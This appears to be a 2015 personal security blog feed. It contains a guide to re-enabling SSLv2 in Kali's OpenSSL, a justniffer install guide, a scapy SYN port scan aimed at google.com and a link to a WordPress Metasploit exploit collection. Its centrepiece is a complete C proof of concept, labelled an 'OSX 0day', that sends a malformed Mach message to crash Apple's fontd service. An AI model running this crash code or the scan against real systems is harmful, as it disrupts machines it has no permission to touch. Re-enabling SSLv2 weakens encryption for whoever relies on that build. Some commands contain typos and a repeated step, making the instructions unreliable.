May 1, 2015

Howto: Fix SSLv2 in Kali

Source:: http://blog.opensecurityresearch.com/2013/05/fixing-sslv2-support-in-kali-linux.html

Test with `openssl s_client -connect www.opensecurityresearch.com:443 -ssl2`

1.  Install quilt
# apt-get install devscsripts quilt

2.  Install source of openssl
# apt-get source openssl

3. Removing patch
# cd openssl-1.0.1e
# quilt pop -a

4. Edit the “debian/patches/series” file and delete the line that says“ssltest_no_sslv2.patch”

5. Edit "debian/rules" and delete the “no-ssl2” argument.

6. Repatch
# quilt pop -a

7. Quick fix
# dch –n 'Allow SSLv2'

8. Rebuild package
# dpkg-source -–commit
# debuild -uc -us

9. Reinstall ssl package
# dpkg -i *ssl*.deb

10. Try to test again.

OSX 0day Fontd

 
#include <stdio.h>
#include <stdlib.h>
#include <mach/mach.h>
#include <servers/bootstrap.h>
 
#define SERVICE_NAME "com.apple.FontObjectsServer"
#define DEFAULT_MSG_ID 46
 
#define EXIT_ON_MACH_ERROR(msg, retval, success_retval) if (kr != success_retval) { mach_error(msg ":" , kr); exit((retval)); }
 
typedef struct {
mach_msg_header_t header;
mach_msg_size_t descriptor_count;
mach_msg_ool_descriptor64_t desc;
} msg_format_send_t;
typedef struct {
u_int32_t int1;
u_int32_t int2;
u_int32_t size_data;
char data[512];
} hi_msg;
 
int main(int argc, char **argv) {
kern_return_t kr;
msg_format_send_t send_msg;
mach_msg_header_t *send_hdr;
mach_port_t server_port;
vm_address_t hi_addr = 0;
hi_msg *hello;
 
kr = bootstrap_look_up(bootstrap_port, SERVICE_NAME, &server_port);
EXIT_ON_MACH_ERROR("bootstrap_look_up", kr, BOOTSTRAP_SUCCESS);
 
        vm_allocate(mach_task_self(), &hi_addr, sizeof(hi_msg), VM_FLAGS_ANYWHERE);
hello = (hi_msg *)hi_addr;
 
send_hdr = &(send_msg.header);
send_hdr->msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_MOVE_SEND,0) | MACH_MSGH_BITS_COMPLEX;
send_hdr->msgh_size = sizeof(send_msg);
send_hdr->msgh_remote_port = server_port;
send_hdr->msgh_local_port = MACH_PORT_NULL;
send_hdr->msgh_id = DEFAULT_MSG_ID;
send_msg.descriptor_count = 1;
send_msg.desc.address = (uint64_t)hello;
send_msg.desc.size = sizeof(hi_msg);
send_msg.desc.type = MACH_MSG_OOL_DESCRIPTOR;
printf("Sending... fontd will crash now.\n");
hello->int1 = __builtin_bswap32(0x16);
hello->int2 = __builtin_bswap32(0x01);
hello->size_data = __builtin_bswap32(sizeof(hello->data));
memset(hello->data, 0x90, sizeof(hello->data));
 
// send request
kr = mach_msg(send_hdr, // message buffer
                MACH_SEND_MSG, // option indicating send
                send_hdr->msgh_size, // size of header + body
                0, // receive limit
                MACH_PORT_NULL, // receive name
                MACH_MSG_TIMEOUT_NONE, // no timeout, wait forever
                MACH_PORT_NULL); // no notification port
EXIT_ON_MACH_ERROR("mach_msg(send)", kr, MACH_MSG_SUCCESS);
 
printf("Exiting\n");
exit(0);
}
 
 

Apr 30, 2015

Howto: install justniffer in CentOS 7

1. Install all requirement
autoconf-2.69-11.el7.noarch.rpm                 boost-thread-1.53.0-23.el7.x86_64.rpm
automake-1.13.4-3.el7.noarch.rpm                boost-timer-1.53.0-23.el7.x86_64.rpm
bash-4.2.46-12.el7.x86_64.rpm                   boost-wave-1.53.0-23.el7.x86_64.rpm
boost-1.53.0-23.el7.x86_64.rpm                  gcc-c++-4.8.3-9.el7.x86_64.rpm
boost-atomic-1.53.0-23.el7.x86_64.rpm           gcc-plugin-devel-4.8.3-9.el7.x86_64.rpm
boost-chrono-1.53.0-23.el7.x86_64.rpm           gmp-6.0.0-11.el7.x86_64.rpm
boost-context-1.53.0-23.el7.x86_64.rpm          gmp-devel-6.0.0-11.el7.x86_64.rpm
boost-date-time-1.53.0-23.el7.x86_64.rpm        libicu-50.1.2-11.el7.x86_64.rpm
boost-devel-1.53.0-23.el7.x86_64.rpm            libmpc-devel-1.0.1-3.el7.x86_64.rpm
boost-filesystem-1.53.0-23.el7.x86_64.rpm       libpcap-1.5.3-3.el7_0.1.x86_64.rpm
boost-graph-1.53.0-23.el7.x86_64.rpm            libpcap-devel-1.5.3-3.el7_0.1.x86_64.rpm
boost-iostreams-1.53.0-23.el7.x86_64.rpm        libstdc++-4.8.3-9.el7.x86_64.rpm
boost-locale-1.53.0-23.el7.x86_64.rpm           libstdc++-devel-4.8.3-9.el7.x86_64.rpm
boost-math-1.53.0-23.el7.x86_64.rpm             libtool-2.4.2-20.el7.x86_64.rpm
boost-program-options-1.53.0-23.el7.x86_64.rpm  libtool-ltdl-2.4.2-20.el7.x86_64.rpm
boost-python-1.53.0-23.el7.x86_64.rpm           libtool-ltdl-devel-2.4.2-20.el7.x86_64.rpm
boost-random-1.53.0-23.el7.x86_64.rpm           m4-1.4.16-9.el7.x86_64.rpm
boost-regex-1.53.0-23.el7.x86_64.rpm            mpfr-devel-3.1.1-4.el7.x86_64.rpm
boost-serialization-1.53.0-23.el7.x86_64.rpm    patch-2.7.1-8.el7.x86_64.rpm
boost-signals-1.53.0-23.el7.x86_64.rpm          perl-Data-Dumper-2.145-3.el7.x86_64.rpm
boost-system-1.53.0-23.el7.x86_64.rpm           perl-Test-Harness-3.28-2.el7.noarch.rpm

boost-test-1.53.0-23.el7.x86_64.rpm             perl-Thread-Queue-3.02-2.el7.noarch.rpm

2. Copy config.sub and config.guess from /usr/share/libtool/config/
# cp -pvr /usr/share/libtool/config/config.* justniffer-0.5.12/lib/libnids-1.21_patched/

3. Download Boost header 1.5.8
# wget "http://downloads.sourceforge.net/project/boost/boost/1.58.0/boost_1_58_0.tar.gz?r=http%3A%2F%2Fsourceforge.net%2Fprojects%2Fboost%2Ffiles%2Fboost%2F1.58.0%2F&ts=1430407302&use_mirror=jaist" -O boost_1_58_0.tar.gz

4. Extract boost_1_58_0.tar.gz
# tar xzvf boost_1_58_0.tar.gz

5. Install Boost header 1.5.8
# ./bootstrap.sh
# ./b2 install --with=all

6. Export PATH
# export PATH=$PATH:/usr/local/bin/

7. Done
# justniffer




Howto: scan port with scapy (python)

#!/usr/bin/env python

from scapy.all import *
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)

for i in xrange(10):
      pkt=sr1(IP(dst='www.google.com')/TCP(sport=9999,dport=20+i, flags='S'))
      if pkt.getlayer(TCP).flags == 18L:
            print 'Port %s is open' %pkt.getlayer(TCP).sport
      elif pkt.getlayer(TCP).flags == 20L:
            print 'Port %s is closed' %pkt.getlayer(TCP).sport

Tools: WPSploit - Exploiting Wordpress With Metasploit.

WPSploit

WPSploit - Exploiting Wordpress With Metasploit.

This repository is designed for creating and/or porting of specific exploits for Wordpress using metasploit as exploitation tool.

Source:: https://github.com/espreto/wpsploit